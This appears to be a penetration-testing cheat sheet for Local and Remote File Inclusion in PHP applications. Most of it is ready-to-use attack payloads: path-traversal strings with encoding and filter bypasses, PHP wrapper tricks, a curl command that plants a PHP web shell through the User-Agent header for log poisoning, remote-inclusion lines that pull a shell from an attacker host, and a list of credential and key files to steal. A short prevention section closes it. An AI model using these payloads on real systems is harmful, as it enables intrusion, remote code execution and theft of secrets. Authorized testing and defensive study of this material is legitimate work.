LFI-RFI
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Local and Remote File Inclusion: detection, path traversal, PHP wrappers and log poisoning to RCE. Test only in-scope targets.
DETECTION#
?page=index.php -> ?page=../../../../etc/passwd
?file=about -> ?file=../../../../etc/passwd%00 (legacy null byte)
# Windows
?page=..\..\..\..\windows\win.ini
# Confirm read
/etc/passwd /etc/hosts /proc/self/environ C:\windows\win.ini
PATH TRAVERSAL BYPASSES#
Encoding:
..%2f..%2f..%2fetc%2fpasswd
..%252f..%252f # double URL-encode
%2e%2e%2f # encoded dots and slash
..%c0%af # overlong UTF-8 (legacy)
Filter evasion:
....//....// # strips "../" once -> leaves "../"
..././..././
/var/www/../../etc/passwd # absolute + traversal
..%00/ # null truncation (old PHP)
Path prefix/suffix forced by the app:
# App appends ".php": use ....//, wrappers, or null byte (legacy)
# App prepends a dir: traverse out with ../
PHP WRAPPERS#
Read source (base64 so PHP is not executed):
php://filter/convert.base64-encode/resource=index.php
php://filter/read=string.rot13/resource=config.php
Data / input wrappers (need allow_url_include / config):
data://text/plain;base64,<base64 of <?php ... ?>>
php://input # POST body executed as PHP
expect://id # if expect extension loaded
Zip / phar:
zip://shell.jpg%23payload.php
phar://uploaded.phar/x
LOG / SESSION POISONING TO RCE#
Poison a log the app reads, then include it:
# Send crafted User-Agent containing <?php system($_GET['c']); ?>
curl -A '<?php system($_GET["c"]); ?>' http://target/
# Then include the log
?page=/var/log/apache2/access.log&c=id
?page=/var/log/nginx/access.log
?page=/proc/self/environ # poison via User-Agent
?page=/var/lib/php/sessions/sess_<PHPSESSID>
REMOTE FILE INCLUSION (RFI)#
# Requires allow_url_include=On (rare on modern PHP)
?page=http://attacker/shell.txt
?page=\\attacker\share\shell.php # UNC (Windows/SMB)
USEFUL TARGET FILES#
/etc/passwd /etc/shadow /etc/hosts
/proc/self/environ /proc/self/cmdline /proc/self/fd/N
~/.ssh/id_rsa ~/.bash_history
/var/www/html/config.php wp-config.php .env
C:\windows\win.ini C:\inetpub\wwwroot\web.config
TOOLING & WORDLISTS#
ffuf -w lfi.txt -u 'http://t/?page=FUZZ' -fs <baseline>
LFISuite / kadimus / liffy
SecLists: Fuzzing/LFI/ -> LFI-Jhaddix.txt, LFI-gracefulsecurity-*.txt
PREVENTION (blue side)#
- Never pass user input to include/require/file APIs. - Allowlist filenames (map ids -> fixed paths); reject "../", null bytes. - Disable allow_url_include/allow_url_fopen; open_basedir. See also: COMMAND-INJECTION, SSRF-BYPASS, FILE upload notes in OWASP-TOP10.